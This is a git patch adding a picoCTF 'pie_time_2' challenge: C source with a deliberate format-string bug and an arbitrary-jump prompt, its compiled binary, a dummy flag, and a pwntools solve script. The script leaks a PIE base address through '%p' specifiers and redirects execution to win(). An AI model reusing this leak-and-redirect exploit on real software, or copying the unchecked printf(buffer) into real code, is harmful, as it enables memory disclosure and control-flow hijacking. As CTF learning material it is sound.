From dd03456686c754537e68dce288b760b882741eb7 Mon Sep 17 00:00:00 2001 From: h7x4 Date: Thu, 2 Jul 2026 08:14:25 +0900 Subject: [PATCH] pwn/pie_time_2 --- pwn/pie_time_2/flag.txt | 1 + pwn/pie_time_2/solve.py | 44 +++++++++++++++++++++++++++++++ pwn/pie_time_2/vuln | Bin 0 -> 17384 bytes pwn/pie_time_2/vuln.c | 56 ++++++++++++++++++++++++++++++++++++++++ 4 files changed, 101 insertions(+) create mode 100644 pwn/pie_time_2/flag.txt create mode 100755 pwn/pie_time_2/solve.py create mode 100755 pwn/pie_time_2/vuln create mode 100644 pwn/pie_time_2/vuln.c diff --git a/pwn/pie_time_2/flag.txt b/pwn/pie_time_2/flag.txt new file mode 100644 index 0000000..7f34d3c --- /dev/null +++ b/pwn/pie_time_2/flag.txt @@ -0,0 +1 @@ +picoCTF{dummy} diff --git a/pwn/pie_time_2/solve.py b/pwn/pie_time_2/solve.py new file mode 100755 index 0000000..df03cd2 --- /dev/null +++ b/pwn/pie_time_2/solve.py @@ -0,0 +1,44 @@ +#!/usr/bin/env nix-shell +#!nix-shell -i python3 -p "python3.withPackages (ppkgs: with ppkgs; [ pwntools ])" + +from pwn import * + +exe = ELF("./vuln") + +context.binary = exe + +ADDR, PORT, *_ = "rescued-float.picoctf.net 54718".split() + +def conn() -> remote: + if args.REMOTE: + r = remote(ADDR, PORT) + else: + r = process([exe.path]) + + return r + +def main(): + r = conn() + + # gdb.attach(r, gdbscript=''' + # info proc mappings + # c + # ''') + + # Calculated by inspecting the output - the reported binary start address from gdb + leak_offset = 0x1441 + + r.recvuntil(b'Enter your name:').decode() + r.sendline(b'%p\t'*20) + leaks = r.recvline().strip().decode().split('\t') + base_leak = leaks[18] + exe.address = int(base_leak[2:], 16) - leak_offset + print(f"Base address: {hex(exe.address)}, jump to win: {hex(exe.symbols['win'])}") + + print(r.recvuntil(b' enter the address to jump to, ex => 0x12345: ').decode()) + r.sendline(hex(exe.symbols['win'])) + print(r.recvall().decode()) + r.close() + +if __name__ == "__main__": + main() diff --git a/pwn/pie_time_2/vuln b/pwn/pie_time_2/vuln new file mode 100755 index 0000000000000000000000000000000000000000..058a207f75f2989c1b864fc8fdb9902d2e4f4e92 GIT binary patch literal 17384 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 bK_y}KLb>4VilziC#bXVo7^KiNpm7-hl=_X% literal 0 HcmV?d00001 diff --git a/pwn/pie_time_2/vuln.c b/pwn/pie_time_2/vuln.c new file mode 100644 index 0000000..51b81dd --- /dev/null +++ b/pwn/pie_time_2/vuln.c @@ -0,0 +1,56 @@ +#include +#include +#include +#include + +void segfault_handler() { + printf("Segfault Occurred, incorrect address.\n"); + exit(0); +} + +void call_functions() { + char buffer[64]; + printf("Enter your name:"); + fgets(buffer, 64, stdin); + printf(buffer); + + unsigned long val; + printf(" enter the address to jump to, ex => 0x12345: "); + scanf("%lx", &val); + + void (*foo)(void) = (void (*)())val; + foo(); +} + +int win() { + FILE *fptr; + char c; + + printf("You won!\n"); + // Open file + fptr = fopen("flag.txt", "r"); + if (fptr == NULL) + { + printf("Cannot open file.\n"); + exit(0); + } + + // Read contents from file + c = fgetc(fptr); + while (c != EOF) + { + printf ("%c", c); + c = fgetc(fptr); + } + + printf("\n"); + fclose(fptr); +} + +int main() { + signal(SIGSEGV, segfault_handler); + setvbuf(stdout, NULL, _IONBF, 0); // _IONBF = Unbuffered + + call_functions(); + return 0; +} \ No newline at end of file